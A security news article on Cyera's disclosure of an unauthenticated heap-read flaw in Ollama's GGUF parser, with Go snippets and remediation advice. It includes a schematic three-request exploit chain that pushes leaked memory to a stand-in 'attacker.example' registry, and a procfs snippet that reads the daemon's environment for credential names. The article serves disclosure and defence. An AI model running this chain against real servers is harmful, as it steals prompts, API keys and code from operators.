
A crafted Ollama model file leaks the whole server's memory. 300,000 instances are exposed.

Cyera disclosed CVE-2026-7482 on May 2: a CVSS 9.1 unauthenticated heap read in Ollama. Three API calls dump prompts, env vars, and API keys from any open instance.

Luca Reinhardt · 4 min read · 2 sources
Cyera Research disclosure illustration for the Bleeding Llama vulnerability in Ollama's model execution pipeline
Image via Cyera Research

Cyera Research published the Bleeding Llama disclosure on May 2 for CVE-2026-7482, a CVSS 9.1 unauthenticated heap read in Ollama’s quantization pipeline. Three API calls hand the attacker a copy of the running process’s memory: prompts, system prompts, environment variables, and whatever API keys the operator exported when they launched the binary.

The bug matters because of how Ollama ships by default. It binds to 0.0.0.0, has no built-in authentication, and the project’s quick-start instructions don’t warn against putting it on a public interface. Cyera says roughly 300,000 instances are reachable from the open internet. That is the install base running the GGUF-shaped attack surface this CVE describes.

What we know

Researcher Dor Attias of Cyera found the bug in Ollama’s GGUF parser. When the runtime loads a model, a quantization conversion function walks tensors using the shape field as its loop bound. If an attacker uploads a GGUF blob whose shape field claims a tensor is far bigger than the buffer actually holds, the loop reads past the allocation and into adjacent heap data. Attias writes that “if an attacker puts a very large number in the shape field, the loop will blindly read past the end of the buffer, that’s our out-of-bounds heap read.”
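
To make the pattern concrete, here is a minimal Go sketch of the bug class. It is not Ollama's actual code; the function and field names are invented, and Go's bounds checks would turn the overread into a panic where the memory-unsafe quantization code reads adjacent heap silently. The check marked below is the one the vulnerable path lacks.

    package main

    import (
        "encoding/binary"
        "errors"
        "fmt"
        "math"
    )

    // dequantizeF32 is an invented stand-in for the conversion step Attias
    // describes: the element count comes from the GGUF header's shape
    // field, while data holds only the bytes actually present in the file.
    func dequantizeF32(shape []uint64, data []byte) ([]float32, error) {
        n := uint64(1)
        for _, d := range shape {
            n *= d // every factor is attacker-controlled header metadata
        }
        // The missing check: without this, the loop below trusts the
        // header and walks past the end of the buffer.
        if n > uint64(len(data))/4 {
            return nil, errors.New("shape claims more elements than the blob holds")
        }
        out := make([]float32, n)
        for i := range out {
            out[i] = math.Float32frombits(
                binary.LittleEndian.Uint32(data[i*4:]))
        }
        return out, nil
    }

    func main() {
        blob := make([]byte, 16) // the file really contains four floats
        _, err := dequantizeF32([]uint64{1 << 20}, blob) // header claims ~1M
        fmt.Println(err) // rejected up front instead of read out of bounds
    }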

The exfiltration path uses three calls in sequence, sketched below:

  • POST /api/blobs/sha256:[hash] stages the malicious GGUF blob.
  • POST /api/create registers a model whose name field doubles as the attacker’s destination URL.
  • POST /api/push ships the model to that URL, and the manifest the runtime serializes carries the leaked heap bytes along for the ride.
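
Schematically, the chain is three unauthenticated POSTs. A minimal Go sketch, with placeholder names: the endpoints are the ones listed above, but the request bodies, the digest, and the attacker.example registry host are illustrative, not the exact wire format.

    package main

    import (
        "bytes"
        "fmt"
        "net/http"
    )

    // post fires one unauthenticated request and reports the status.
    func post(url, contentType, body string) {
        resp, err := http.Post(url, contentType, bytes.NewBufferString(body))
        if err != nil {
            fmt.Println(url, "->", err)
            return
        }
        defer resp.Body.Close()
        fmt.Println(url, "->", resp.Status)
    }

    func main() {
        target := "http://victim:11434"
        digest := "sha256:<digest-of-crafted-gguf>" // placeholder, not computed here

        // 1. Stage the crafted GGUF blob (malicious bytes elided).
        post(target+"/api/blobs/"+digest, "application/octet-stream",
            "<crafted gguf bytes>")

        // 2. Register a model; its name carries the attacker's registry
        //    host (body schema is schematic).
        post(target+"/api/create", "application/json",
            `{"name":"attacker.example/leak","files":{"model.gguf":"`+digest+`"}}`)

        // 3. Push to that registry; the serialized manifest ferries the
        //    leaked heap bytes off the box.
        post(target+"/api/push", `application/json`,
            `{"name":"attacker.example/leak"}`)
    }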

None of these endpoints require authentication. They are the same endpoints Ollama’s own CLI uses, so any internet-reachable instance accepts them by design.

Cyera’s disclosure timeline puts the report to Ollama on February 2, the upstream pull request on February 25, the CNA assignment by Echo on April 28, the CVE publication on May 1, and the public writeup on May 2. The patch is in the codebase, but the fix shipped without a CVE attached for two months, so a lot of operators upgraded without realizing what the changelog actually closed.

What an attacker pulls out depends on what’s resident in the process. Prompts and system prompts are obvious. Environment variables get loaded once at startup and sit in the heap for the life of the daemon, so OLLAMA_HOST, OPENAI_API_KEY, ANTHROPIC_API_KEY, and anything similar passed in via systemd unit or docker run -e are reachable. Cyera notes that for users running Ollama as a sidecar to a coding assistant, the leaked memory has also included pieces of proprietary code that the model had recently processed.
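
To know what to rotate, the daemon's launch environment is recoverable on Linux from procfs, provided you run as the same user or root. A minimal sketch, assuming the pid comes from pgrep -x ollama:

    package main

    import (
        "fmt"
        "os"
        "strings"
    )

    func main() {
        pid := os.Args[1] // pass the pid, e.g. from: pgrep -x ollama
        raw, err := os.ReadFile("/proc/" + pid + "/environ")
        if err != nil {
            panic(err)
        }
        // Entries are NUL-separated KEY=value pairs; print only names
        // that look like credentials, never the values.
        for _, kv := range strings.Split(string(raw), "\x00") {
            name, _, ok := strings.Cut(kv, "=")
            if !ok {
                continue
            }
            if strings.Contains(name, "KEY") ||
                strings.Contains(name, "TOKEN") ||
                strings.Contains(name, "SECRET") {
                fmt.Println(name)
            }
        }
    }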

What we don’t know

Cyera’s writeup does not name a fixed version, only “upgrade to the latest release.” The PR landed in February, but Ollama’s tagged releases between February and May contain several other changes, so operators are stuck reading the diff themselves. The project’s advisory archive on GitHub did not carry a CVE entry at publication time, which is why the bug went more than two months between patch commit and disclosure without showing up in vulnerability scanners.

The 300,000-server figure is Cyera’s Shodan-based scan. How many of those are still on a pre-February build is an open question. Hobbyist Ollama installs only pick up the fix when the user remembers to upgrade the binary, which is rarely. Enterprise sidecars pinned to a Docker image hash don’t update at all unless someone bumps the tag.

Source attribution

The technical breakdown and the exposure number come from Cyera Research, the firm that disclosed the bug. Echo is the CVE Numbering Authority that assigned the identifier. The Reddit r/netsec submission is where the disclosure first surfaced to a wider security audience.

What this means for you

If you run Ollama and it’s bound to anything other than 127.0.0.1, take it offline now. Rebind it to localhost (the daemon reads its bind address from OLLAMA_HOST), put it behind an authenticated reverse proxy, or firewall the port. The patch closes the OOB read, but everything that was in the heap before you upgraded was potentially exposed for as long as the bug sat in the wild.
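
To confirm you’re actually closed off, probe the API from a machine that should not have access. /api/version is a standard unauthenticated Ollama endpoint; the hostname below is a placeholder. If this returns a version string, the three-call chain above works too.

    package main

    import (
        "fmt"
        "io"
        "net/http"
        "time"
    )

    func main() {
        client := &http.Client{Timeout: 3 * time.Second}
        // Run this from a machine that should NOT have access.
        resp, err := client.Get("http://your-ollama-host:11434/api/version")
        if err != nil {
            fmt.Println("unreachable (good):", err)
            return
        }
        defer resp.Body.Close()
        body, _ := io.ReadAll(resp.Body)
        fmt.Println("still exposed:", resp.Status, string(body))
    }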

Rotate API keys you handed to the daemon: OPENAI_API_KEY, Anthropic, Cohere, anything else you put in the environment that launched ollama serve. The leak primitive reads whatever sits past the buffer in heap memory, so assume those values walked. Ollama doesn’t redact env vars from its process memory because it has no reason to.

If you’re running Ollama as a developer sidecar inside a corporate network, treat this the same way you’d treat any unauthenticated localhost service that crossed the perimeter. The 0.0.0.0 default is the part that turns a parsing bug into a population-scale problem, and the project has not changed that default.


Quick reference

CVSS
Common Vulnerability Scoring System, the 0 to 10 severity scale used by NVD; 7.0+ counts as High, 9.0+ Critical.
GGUF
A binary file format for storing quantized LLM weights, used by llama.cpp and Ollama. Tensor metadata sits in a header before the weight blob.
